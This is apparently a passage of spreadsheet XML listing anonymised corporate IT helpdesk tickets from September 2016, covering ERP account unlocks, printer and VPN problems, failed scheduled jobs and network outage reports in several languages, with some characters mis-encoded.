das file ist unter folgenden link verfÃ¼gbar._x000D_
_x000D_
_x000D_
seit heute frÃ¼h ist es nicht mehr mÃ¶glich die datei zu bearbeiten, da folgende fehlermeldung beim Ã¶ffnen der datei eingeblendet wird._x000D_
_x000D_
[cid:image002.png@01d20e87.e5b872d0]_x000D_
_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ssen / best </t>
  </si>
  <si>
    <t xml:space="preserve">mii uacyltoe hxgaycze from lacw8515941  : duration is high for loading  as 39.69 s and refresh loaded 19.11 s   </t>
  </si>
  <si>
    <t>erp mii is not functioning.</t>
  </si>
  <si>
    <t xml:space="preserve">erp mii is not functioning in raonoke rapids. employees are unable to use the software to clock out. software is locked.
phone: </t>
  </si>
  <si>
    <t>bnsh0901 account unlock in erp SID_34</t>
  </si>
  <si>
    <t>zlkhvseb bpzvrhsj</t>
  </si>
  <si>
    <t>business_client not responding</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjanhbde.owfkyjcp@gmail.com_x000D_
_x000D_
helloâ€¦_x000D_
_x000D_
refer the below screen shotâ€¦._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d20ea1.751c5400]_x000D_
_x000D_
_x000D_
_x000D_
warm </t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/14/2016 06:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/14/2016 06:09:00</t>
  </si>
  <si>
    <t>printer problem / issue information i am trying to print to tc78 on hqntn06. drivers need updated.</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</si>
  <si>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tc78 on hqntn06_x000D_
 _x000D_
   â€¢  detailed description of the problem ? drivers need updated, but will not load._x000D_
_x000D_
   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) all_x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls) windows_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? no_x000D_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</si>
  <si>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jusenflm sufbehom</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cobsfvjz.apkqmrdu@gmail.com_x000D_
_x000D_
dear sir/madam_x000D_
_x000D_
i am not able to connect to vpn ._x000D_
_x000D_
please address ._x000D_
_x000D_
also install the new apvpn as well ._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cobsfvjz apkqmrdu</t>
  </si>
  <si>
    <t>ng_ff90 account unlock in erp SID_34</t>
  </si>
  <si>
    <t>barcodescanner an eemw8144133 defekt - bitte austauschen</t>
  </si>
  <si>
    <t>barcodescanner an eemw8144133 defekt - bitte austauschen.  pc befindet sich im anlagenbereich cvd</t>
  </si>
  <si>
    <t>ioebfyud olfmydhn</t>
  </si>
  <si>
    <t>unable to print. need a driver update.</t>
  </si>
  <si>
    <t>nbcvpeui rbphxitm</t>
  </si>
  <si>
    <t>unable to print. driver not updating.</t>
  </si>
  <si>
    <t>eruzljih epclbgmi</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/14/2016 04:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/14/2016 04:54:00</t>
  </si>
  <si>
    <t>install vlc</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
please install vlc player in my system. i am not able to play some products demonstrations in wmp._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/14/2016 04:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_sql_prod_inc failed in job_scheduler at: 09/14/2016 04:52:00</t>
  </si>
  <si>
    <t>service kit 8150 fÃ¼r we01 liefern \hcuixqgj mavxgqbs</t>
  </si>
  <si>
    <t>probleme mit office365 \dtlmbcrx mwuateyx</t>
  </si>
  <si>
    <t>probleme mit chargenverwaltung \tmqfjard qzhgdoua</t>
  </si>
  <si>
    <t>probleme mit chargenverwaltung \howfanzi siavgtby</t>
  </si>
  <si>
    <t>setup new ws \uadkqcsj xtmjlari</t>
  </si>
  <si>
    <t>uadkqcsj xtmjlari</t>
  </si>
  <si>
    <t>need assistance to transfer elengineering toolonic amb show ticket onto my company iphone</t>
  </si>
  <si>
    <t>zfvyejcx euanqiht</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_499 failed in job_scheduler at: 09/14/2016 04:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_499 failed in job_scheduler at: 09/14/2016 04:37:00</t>
  </si>
  <si>
    <t>excel issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: anuxbyzg.bvsqcjkw@gmail.com_x000D_
_x000D_
not able to open an excel file with the following error message:_x000D_
_x000D_
[cid:image003.jpg@01d20e72.fd691a70]_x000D_
_x000D_
route of the file: [cid:image004.png@01d20e72.fd691a70]_x000D_
_x000D_
gruÃŸ </t>
  </si>
  <si>
    <t>freischaltung des ordners "ce ap daten" im laufwerk departmenst \\HostName_579 (m:)</t>
  </si>
  <si>
    <t>bitte fÃ¼r oben genannten ordner schreib- und leserecht freischalten. der ordner wird zur tÃ¤glichen arbeit benÃ¶tigt</t>
  </si>
  <si>
    <t>qfetblky iwflmhuc</t>
  </si>
  <si>
    <t>efdl8111218 - outlook issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wcnfvajb.kxylsamv@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
_x000D_
after password change my outlook is not opening any more._x000D_
_x000D_
can you please help me?_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / kind </t>
  </si>
  <si>
    <t>wcnfvajb kxylsamv</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_481 failed in job_scheduler at: 09/14/2016 03:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_481 failed in job_scheduler at: 09/14/2016 03:39:00</t>
  </si>
  <si>
    <t>restore deleted opportunities</t>
  </si>
  <si>
    <t xml:space="preserve">hello shikghtyuha,
per my email it seems that user ukwfgxrl rieqbtnp has deleted some of the opportunities of another user rqfmcjak gcxvtbrz. i do not have details on those oportunities as they are not visible anymore, all i can say is that they have been deleted in the period of 1-14 september. most likely their opportstorage_product name start with "ae seibel". 
could you please verify if there is any chance to restore them. 
</t>
  </si>
  <si>
    <t>please reactivate the id - tempuser in SID_34 - erp production</t>
  </si>
  <si>
    <t>pls reset the password for tempuser for erp SID_34.(erp prodn)</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_501 failed in job_scheduler at: 09/14/2016 03:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_501 failed in job_scheduler at: 09/14/2016 03:25:00</t>
  </si>
  <si>
    <t>frequent wifi diconnection in the new bay at basis area...</t>
  </si>
  <si>
    <t>team,_x000D_
_x000D_
please check we are having frequent disconnection to the wifi, all our connections to erp, skype are disconnecting..</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_483 failed in job_scheduler at: 09/14/2016 02:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_483 failed in job_scheduler at: 09/14/2016 02:48:00</t>
  </si>
  <si>
    <t>pc eemw8144218 und drucker im abstechprogramdntym aufstellen</t>
  </si>
  <si>
    <t>please reset my SID_34  erp  password.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ipqgrnxk.acxedqjm@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please reset my SID_34  erp  password._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ipqgrnxk acxedqjm</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 09/14/2016 01:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 09/14/2016 01:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">erpï½11 locked </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zuxcfonv.nyhpkrbe@gmail.com
gso,
please unlock the erp SID_34 account for id tjtigtyps soon ,don't reset password , </t>
  </si>
  <si>
    <t>zollerfgh machine image restoration</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vkzwibco.pueyvhoi@gmail.com_x000D_
_x000D_
hello!_x000D_
_x000D_
the image of a machine pc (zollerfgh genius 3s) needs to be restored to the pc from the pen drive. please help with this issue on an urgent basis._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>drucker em93 (bei frau zeilmann) defekt: das papier wird wÃ¤hrend des druck-/kopiervorganges geknittert.</t>
  </si>
  <si>
    <t>hardware damage</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: skmdgnuh.utgclesd@gmail.com_x000D_
_x000D_
sir,_x000D_
_x000D_
i am facixepyfbga wtqdyoin ware issues in my laptop, my monitor plastic portion has come out of the groove and left control key is not working, kindly take necessary action._x000D_
_x000D_
below is details of laptop._x000D_
_x000D_
[cid:image001.png@01d20e77.584241c0]_x000D_
_x000D_
with warm </t>
  </si>
  <si>
    <t>erp logon password</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ryculmsd.wofgvkrb@gmail.com
hi,
please send me a new password for my erp.
lost mine â€“ sorry!!
janhytrn ooshstyizen
sales manager - construction sa
ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;
new road king bit catalog:    
</t>
  </si>
  <si>
    <t>prdord226024765   226024766     226024794      can not release please help me to fix it.</t>
  </si>
  <si>
    <t>the business transaction cannot be carried out.</t>
  </si>
  <si>
    <t>enterprise scan client (open text) for erp needs to be installed on</t>
  </si>
  <si>
    <t xml:space="preserve">computer eagw000312t_x000D_
connected scanner is fujitsu fi 6130_x000D_
scanner driver needs also to be installed._x000D_
computer and scanner is online and nobody is working on it until scan client is installed. so you can take everytime controll over the computer._x000D_
open text viewer is already installed. _x000D_
if you need on site support please let me know_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 09/14/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 09/14/2016 01:15:00</t>
  </si>
  <si>
    <t>vpn ä¸èƒ½è¿žæŽ¥ï¼Œæç¤ºæ— æ³•æ‰¾æ‰“é˜²ç—…æ¯’è½¯ä»¶ã€‚</t>
  </si>
  <si>
    <t>vpn ä¸èƒ½è¿žæŽ¥ï¼Œæç¤ºæ— æ³•æ‰¾æ‰“é˜²ç—…æ¯’è½¯ä»¶ã€‚ symantec è½¯ä»¶æœåŠ¡ä¸èƒ½å¯åŠ¨ã€‚</t>
  </si>
  <si>
    <t>nhrwdaep orvxhyiw</t>
  </si>
  <si>
    <t>monthly quality working group (qwg) - global round tools - input needed!</t>
  </si>
  <si>
    <t xml:space="preserve">hello help team, _x000D_
_x000D_
pls see ralf's email below. _x000D_
last month we had some write access issues. _x000D_
is it possible that all participants of the round tool group can work on this collaboration_platform file even if the file name will change._x000D_
i need to update this file each month and save it under the respective month._x000D_
if not, do you have any idea how we can handle that? _x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>need support</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ehfvwltg.eakjbtoi@gmail.com_x000D_
_x000D_
helloï¼Œ_x000D_
_x000D_
material noï¼š 7309039 ï¼Œ can not use in purchasing , please replicate_x000D_
._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>ehfvwltg eakjbtoi</t>
  </si>
  <si>
    <t>bw server error message</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
one of company user, uxndyfrs vahxnfgl, sometimes go error message below.
i think this is erp server connection issue.
do you have any solution for this?
error shows "an error happened during accessing bw server. connection was stopped because of this error"
âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž
xmgptwho fmcxikqz k.k.
æµ…é‡Ž å¥ / takeshi asano
âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž
</t>
  </si>
  <si>
    <t xml:space="preserve">system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):SID_52 , SID_53
enter user id of user having the issue:mathyida
transaction code(s) the user needs or was working with: unable to logon (locked)
describe the issue: please unlock the account and reset the password for both the systems.
</t>
  </si>
  <si>
    <t>psbulrdt jxkvzmnf</t>
  </si>
  <si>
    <t>i am unable to update profile details.</t>
  </si>
  <si>
    <t>i am unable to update profile details/ its given (unable to update user shighjvnn - not found!) error. please assist me.</t>
  </si>
  <si>
    <t>duwvesim cixqbmfr</t>
  </si>
  <si>
    <t>virus in my laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gqwdslpc.clhgpqnb@gmail.com_x000D_
_x000D_
my system is virus effected, please remove permanently._x000D_
_x000D_
please find below screen shot._x000D_
_x000D_
[cid:image003.jpg@01d20e64.349b30f0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>omLHxJVE PYudFZBW</t>
  </si>
  <si>
    <t>account is getting locked from HostName_895</t>
  </si>
  <si>
    <t>vwdghyai pjehycoz</t>
  </si>
  <si>
    <t>vpn è¿žæŽ¥åŽè‡ªåŠ¨æ–­å¼€ã€‚</t>
  </si>
  <si>
    <t>vpn è¿žæŽ¥åŽè‡ªåŠ¨æ–­å¼€ï¼Œæç¤ºè°ƒåˆ¶è§£è°ƒå™¨æ²¡æœ‰æ‰¾åˆ°</t>
  </si>
  <si>
    <t xml:space="preserve">i am having problems logging into the na vpn.  </t>
  </si>
  <si>
    <t>i am having problems logging into the na vpn.  i am receiving an error message saying that my username or password is incorrect even though i know it is correct.</t>
  </si>
  <si>
    <t>companyguest wifi login pw &amp; user name</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yhmzxcia.heszapvl@gmail.com_x000D_
_x000D_
hi,_x000D_
please help to create a permanent companyguest wifi login pw and user name for our office._x000D_
we need this password and user name so that as and when we have guest coming for training or meeting to be able to login._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>delivery 9169288744 displaying no intercompany billing error message but the intercompany does exist.</t>
  </si>
  <si>
    <t>unable to process order through k.i.s shipping system due to the system not registering the existing intercompany billing.</t>
  </si>
  <si>
    <t>cannot log into vpn</t>
  </si>
  <si>
    <t>name:cagrty
language:
browser:microsoft internet explorer
email:iehdjwvt.rndtlyhv@gmail.com
customer number:
telephone:
summary:cannot log into vpn</t>
  </si>
  <si>
    <t>erp account unlocked</t>
  </si>
  <si>
    <t>oylukbas hzrbaksx</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_48hotf failed in job_scheduler at: 09/13/2016 19:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_48hotf failed in job_scheduler at: 09/13/2016 19:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37hoti failed in job_scheduler at: 09/13/2016 19:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37hoti failed in job_scheduler at: 09/13/2016 19:53:00</t>
  </si>
  <si>
    <t>timecards are not generating automatically</t>
  </si>
  <si>
    <t>usimqbpw yufaedbo</t>
  </si>
  <si>
    <t>circuit outage: germany, germany-(company) primary mpls circuit is down since 6:24pm et on 09/13, site up on secondary</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________6:24pm et on 09/13______________x000D_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_____yes____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______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</si>
  <si>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network outage at israel, israel ( sales facility) since 8:30am et 09/13.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __8:30am et 09/13____________________x000D_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_no_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___na_____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</si>
  <si>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circuit outage: paris - () company primary mpls circuit is down since 6:24pm et on 09/13/16, site up on secondary</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________6:24pm et on 09/13/16____________x000D_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_____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ________#332879751 global_telecom_1_________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>network outage: Israel, israel - (company) network is down since 6:24pm et on 09/13/16</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______6:24pm et on 09/13/16_______________x000D_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___no_____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__________#332878989  global_telecom_1 ticket_______________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>åˆ¶ç²‰ä¸‰æ¥¼æŽ§åˆ¶å®¤ç”µè„‘æ•…éšœ</t>
  </si>
  <si>
    <t>åˆ¶ç²‰ä¸‰æ¥¼æŽ§åˆ¶å®¤ç”µè„‘ä¸èƒ½å¼€å¯ï¼Œç”µæºæŒ‡ç¤ºç¯æ¡”è‰²é¢‘é—ªã€‚</t>
  </si>
  <si>
    <t>é“¸é€ è½¦é—´ç”µè„‘æ•…éšœ</t>
  </si>
  <si>
    <t>é“¸é€ è½¦é—´è®°å½•ç”Ÿäº§æ•°æ®çš„ç”µè„‘ä¸èƒ½å¼€æœº</t>
  </si>
  <si>
    <t>ncwfeytj tumlheoi</t>
  </si>
  <si>
    <t>ç”¨å‹å®šæœŸå¤‡ä»½ä¸æˆåŠŸ</t>
  </si>
  <si>
    <t>æœåŠ¡å™¨ç«¯ç”¨å‹ç³»ç»Ÿæœ€è¿‘åŠä¸ªæœˆæ—¥å¤‡ä»½å¤±è´¥</t>
  </si>
  <si>
    <t>circuit outage: germany, steel plant - (company) mpls circuit is down since 6:24pm et on 09/13/16, site up on secondary</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________6:24pm et on 09/13/16_____________x000D_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____no____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______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</si>
  <si>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 request to reset microsoft online services password for rcfwnpbi.kvhedyrc@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>rcfwnpbi kvhedyrc</t>
  </si>
  <si>
    <t>inqury-does email work on phone  without internet connection</t>
  </si>
  <si>
    <t>wallpaper is beshryu, need to change to windows theme</t>
  </si>
  <si>
    <t>unable to communicate to savin c2525 printer</t>
  </si>
  <si>
    <t>HostName_1010(erp search_server server): erpstartsrv.exe service is down since 4:25pm et on 09/13/16</t>
  </si>
  <si>
    <t>ms excel right click not working.</t>
  </si>
  <si>
    <t>ms excel right click not working._x000D_
-connected to the user system using teamviewer._x000D_
-repaired the ms office._x000D_
reopned the excel.its working fine now._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>uacyltoe hxgayczeing is available but i can't get into SID_1</t>
  </si>
  <si>
    <t>update on inplant_858893</t>
  </si>
  <si>
    <t>bftsxkre tqvelzks</t>
  </si>
  <si>
    <t>pos report does not pull the search results.</t>
  </si>
  <si>
    <t xml:space="preserve">pos report does not pull the search results.
--connected to the user system using teamviewer.
-when the user tries to run a pos report as seen in the scren shot , it gives the user error.
-see attachment-
contact:
</t>
  </si>
  <si>
    <t>unable to print from tc53_ps printer</t>
  </si>
  <si>
    <t xml:space="preserve">unable to connect to printer </t>
  </si>
  <si>
    <t>pbxmauen mgekhcyf</t>
  </si>
  <si>
    <t>unable to print, keeps asking to install driver for printer</t>
  </si>
  <si>
    <t xml:space="preserve">unable to print.  </t>
  </si>
  <si>
    <t xml:space="preserve">i am not able to print in usa.  </t>
  </si>
  <si>
    <t>fsqozrxn ejctvlxu</t>
  </si>
  <si>
    <t>npr issues</t>
  </si>
  <si>
    <t>i need access to the npr template. i can load the site but cannot enter a customer.</t>
  </si>
  <si>
    <t>qdmrlzby ouvyfkwc</t>
  </si>
  <si>
    <t>creating a group in collaboration_platform - get error message</t>
  </si>
  <si>
    <t>i am trying to create a group under people in collaboration_platform - get an error message that "the ability to create groups has been turned off by the person who manages your email.</t>
  </si>
  <si>
    <t>cowqyjzm fzsxgapt</t>
  </si>
  <si>
    <t>approve primary email if crm user "kpobysnc tqvefyui" in production</t>
  </si>
  <si>
    <t xml:space="preserve">approve primary email of the crm qlhmawgi sgwipoxn called " kpobysnc tqvefyui" in msd crm production </t>
  </si>
  <si>
    <t>computer won't connect to printer - keeps installing drivers</t>
  </si>
  <si>
    <t xml:space="preserve">hello, it team!  this afternoon, my computer has stopped connecting to printer cl28_ps.  when i attempt to print a document, it prompts me to install a driver for the printer.  i let it do that and re-open the document.  when i try to print again, it does the same thing and then tells me it cannot print.  this is the main printer that i have been using since february, so i'm not sure why it has suddenly stopped working.  if you could please assist me when you get a moment, i'd appreciate it.  i will print to another nearby printer in the meantime (it is allowing me to print to this other network printer).  if you need to contact me, please feel free to call me at  or i can be reached via skype.  </t>
  </si>
  <si>
    <t>gknztesj jysobgwa</t>
  </si>
  <si>
    <t>setup client on e7350 from a e5440 laptop</t>
  </si>
  <si>
    <t>unable to open a powerpoint file</t>
  </si>
  <si>
    <t>name:lpriokwa bgwneavl
language:
browser:microsoft internet explorer
email:lpriokwa.bgwneavl@gmail.com
customer number:
telephone:
summary:i am having difficulty opening a power point.  won't open and says "repair" when i click, it cannot open.</t>
  </si>
  <si>
    <t>lpriokwa bgwneavl</t>
  </si>
  <si>
    <t>cannot sync my internal collaboration_platform notebook.</t>
  </si>
  <si>
    <t xml:space="preserve">i updated my password using password_management_tool and now my collaboration_platform is asking me to enter credentials. if i enter my old password, collaboration_platform says it is incorrect. if i enter my newly updated password, the message "contacting the server for information" pops up, dierppears, then it asks me to sign in again. this collaboration_platform is shared on collaboration_platform between my coworkers and i. i have attached a video to show what is happening. </t>
  </si>
  <si>
    <t>generirtc issue about msoffice version</t>
  </si>
  <si>
    <t>vip 2 - german payroll collaboration_platform site requested</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sbgvrncj.idfhtoqv@gmail.com
hello,
please create a standard collaboration_platform template site for the german payroll implementation project.
owners: jywvemun qngschtz and lixwgnto krutnylz as backup.
full update access should also be usaed to: lixwgnto krutnylz, przcxbml vnjdghui, tvcdfqgp nrbcqwgj, johyue ghjuardt, jywvemun qngschtz, jfcrdavy sxpotjlu , nicrhty edmhihryu
we will also require some vendors external to company to have access to certain folders as well.
please inform as soon as the site have been created.
many </t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
hakim belhadjhamida
 erp password locked as i have entered wrong one. by the way i changed my password this morning
rakthyesh ramdntythanjesh
 hi hakityum
 </t>
  </si>
  <si>
    <t>utpmyswa ilysqzgt</t>
  </si>
  <si>
    <t>erp SID_34 account unlock for laffekr</t>
  </si>
  <si>
    <t>ticket update on inplant_859811</t>
  </si>
  <si>
    <t>ticket update on inplant_859826</t>
  </si>
  <si>
    <t>background reports in erp are not running</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
my nightly erp reports are no longer running each day. i have reset them and they still will not run._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>i am locked out of crm and need to get in to get a shipment out today</t>
  </si>
  <si>
    <t>name:vfjsubao yihelxgp
language:
browser:netscape
email:vfjsubao.yihelxgp@gmail.com
customer number:
telephone:
summary:i am locked out of crm and need to get in to get a shipment out today</t>
  </si>
  <si>
    <t>please activate my new iphone, it is a company owned device.</t>
  </si>
  <si>
    <t xml:space="preserve">from: nwfodmhc exurcwkm 
sent: tuesday, september 13, 2016 9:10 pm
to: fmzdkyqv dbrslnhe
subject: re: sab wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird.
hi michghytuael,
your device has been successfully activated.
</t>
  </si>
  <si>
    <t>fvdtiebg lfrdtizj</t>
  </si>
  <si>
    <t>lhqsm455 :'h' drive is over 85% space consumed. space available: 3 gb</t>
  </si>
  <si>
    <t xml:space="preserve">volume: h:\ label:dat4-lhqsm455 3eea8d28 on server: lhqsm455 is over _x000D_
85% space consumed. space available: 3.0 g </t>
  </si>
  <si>
    <t>audio doesnt work anymore on my laptop</t>
  </si>
  <si>
    <t xml:space="preserve">neither my earbuds nor plantronics are working anymore. </t>
  </si>
  <si>
    <t>mkdptnhv rawxhtgz</t>
  </si>
  <si>
    <t>printer installation</t>
  </si>
  <si>
    <t>name:fbhyeksq caexmols
language:
browser:microsoft internet explorer
email:fbhyeksq.caexmols@gmail.com
customer number:
telephone:
summary:unable to print. have updated drivers, however still saying needs updated</t>
  </si>
  <si>
    <t>fbhyeksq caexmols</t>
  </si>
  <si>
    <t>outlook does not start</t>
  </si>
  <si>
    <t>ojmagzdu qepicvlz</t>
  </si>
  <si>
    <t>unlocked. and confirmed with user.</t>
  </si>
  <si>
    <t>cwmiksxf iamtgrvd</t>
  </si>
  <si>
    <t>locked out of password_management_tool</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vfjsubao.yihelxgp@gmail.com
can you please reset my password?
[cid:image001.png@01d20db0.745c31d0]
vfjsubao yihelxgp
customer service representative
</t>
  </si>
  <si>
    <t>unable to connect to tx02 and tx03</t>
  </si>
  <si>
    <t>hldkncve ptrikgvb</t>
  </si>
  <si>
    <t>ticket udpate on inplant_856928</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
from: fumkcsji sarmtlhyanardhanan _x000D_
sent: tuesday, september 13, 2016 8:36 pm_x000D_
to: bvwepigr ekmarvgd_x000D_
cc: vyluaepi dtwfaejr_x000D_
subject: inc1547039_x000D_
_x000D_
hi jashyht_x000D_
_x000D_
user had called to mention that he needs to be able to get on wireless as he will be travelling._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>add rqiw8514281 to rqigfgage qlhmawgi sgwipoxn</t>
  </si>
  <si>
    <t>name:seghyurghei
language:
browser:microsoft internet explorer
email:mfeyouli.ndobtzpw@gmail.com
customer number:
telephone:
summary:can you add rqiw8514281 to rqigfgage qlhmawgi sgwipoxn</t>
  </si>
  <si>
    <t>time cards missing from service -now &amp; change of supervisors name</t>
  </si>
  <si>
    <t xml:space="preserve">from: sagfhosh karhtyiio 
sent: tuesday, september 13, 2016 11:04 am
to: rabhtui edula
cc: ufpzergq zchjbfdehivashankaraiah; rkupnshb gsmzfojw
subject: inc1540911:time cards missing from ticketing_tool &amp; change of supervisors name
hi rabhtui,
it looks like timecards for last two weeks in august 2016 &amp; 1st week of september 2016 are missing from service -now. i also checked with my team member venkat he is also having same issue.
and also request you to change the supervisor name from erihyuk m baurhty to xabkyoug wdkyiqfx.
inc1540911 is assigned to you please take a look. please  revert for any clarifications.
</t>
  </si>
  <si>
    <t>pdf files are not getting saved (freezes) from server .</t>
  </si>
  <si>
    <t>call disconnected due to vpn disconnection</t>
  </si>
  <si>
    <t>unable to print from cl_75</t>
  </si>
  <si>
    <t>german call // caller disconnected</t>
  </si>
  <si>
    <t>microsoft word stopped working - unable to open files</t>
  </si>
  <si>
    <t>epgjmacy hktjzngw</t>
  </si>
  <si>
    <t>user wanted to contact hr</t>
  </si>
  <si>
    <t>diwlhstv hfktxpib</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_585 failed in job_scheduler at: 09/13/2016 10:22:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_585 failed in job_scheduler at: 09/13/2016 10:22:00</t>
  </si>
  <si>
    <t>frequently getting error in outlook application.</t>
  </si>
  <si>
    <t>frequently getting error in outlook application. error message is attached.</t>
  </si>
  <si>
    <t>xgcnzwsh rwyctfzk</t>
  </si>
  <si>
    <t>call got disconnected as vpn went off for a while</t>
  </si>
  <si>
    <t>auto output for inwarehouse_tools</t>
  </si>
  <si>
